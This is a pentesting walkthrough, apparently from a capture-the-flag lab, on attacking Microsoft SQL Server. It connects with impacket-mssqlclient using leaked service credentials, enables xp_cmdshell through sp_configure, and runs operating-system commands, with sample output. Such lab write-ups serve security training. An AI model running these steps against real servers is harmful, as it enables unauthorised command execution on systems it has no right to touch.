MS-SQL (Microsoft SQL Service)

What is MS SQL?

MS SQL, also known as Microsoft SQL Server, is a relational database management system (RDBMS) developed by Microsoft.

Default MS-SQL System Tables

• master Database: Records all the system-level information for an instance of SQL Server.

• msdb Database: used by SQL Server Agent for scheduling alerts and jobs.

• model Database: used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.

• Resource Database: a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.

• tempdb Database : a work-space for holding temporary objects or intermediate result sets.

Runs on TCP port 1433 and UDP port 1434

Enumeration

Using Impacket

Using impacket-mssqlclient we can connect to the MS-SQL service using the username/user-id and password from a possible publicly available production .dtsConfig files.

impacket-mssqlclient ARCHETYPE\sql_svc@10.129.95.187 -windows-auth

Check user access control

SELECT is_srvrolemember('sysadmin');

If it returns 1, it is True and the user can run cmd commands.

Exploitation

Command execution via xp_cmdshell()

Once we have access to the SQL database we can check if we can use the xp_cmdshell() command using:

 EXEC xp_cmdshell 'net user';

Successful execution would produce an output similar to this:

output                                                            
-----------------------------------------------------------------------------
NULL                                                                   
User accounts for \\ARCHETYPE                                                
NULL                                                                           
------------------------------------------------------------------------------ 
Administrator            DefaultAccount           Guest                        
sql_svc                  WDAGUtilityAccount
The command completed successfully.   

However, if we get the following ERROR, we don't have access to the command and we need to reconfigure the service:

[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

Alternatively, you can check it using the following query/command.

sp_configure;

It would give an output like the one shown below. Here you can find the configuration values of other options/commands as well.

name                              minimum   maximum config_value  run_value
--------------------------------- -------  -------- ------------ -----------
access check cache bucket count     0         65536          0             0
access check cache quota            0    2147483647          0             0
Ad Hoc Distributed Queries          0             1          0             0
........
........
user options                        0         32767          0             0
xp_cmdshell                         0             1          0             0 

Reconfiguration steps

One line command (impacket-mssqlclient)

The simple one-liner in impacket-mssqlclient can do the honours for us.... :)

enable_xp_cmdshell

Alternative

1. If the sp_configure command is set to show advanced options we can just directly set the xp_cmdshell option (aka directly skip to step 5). The best way to know this is to run the command in step 5.

2. If we get the error shown below:

[-] ERROR(ARCHETYPE): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.

Then we have to set the show advanced options to TRUE by using the command:

EXEC sp_configure 'show advanced options', 1;

3. Reconfigure using the RECONFIGURE command.

RECONFIGURE;

4. Check if sp_configure is working with advanced options

sp_configure;

5. Allow xp_cmdshell() using the command:

EXEC sp_configure 'xp_cmdshell', 1;

• Run reconfigure again to allow the xp_cmdshell method. Test if it's working or not using the above diagnosis command.

We can use xp_cmdshell after enabling it like follows:

SQL> xp_cmdshell "whoami"

The sample output is as follows:

output                                                                             
--------------------------------------------------------------------------------   
archetype\sql_svc                                                                  
NULL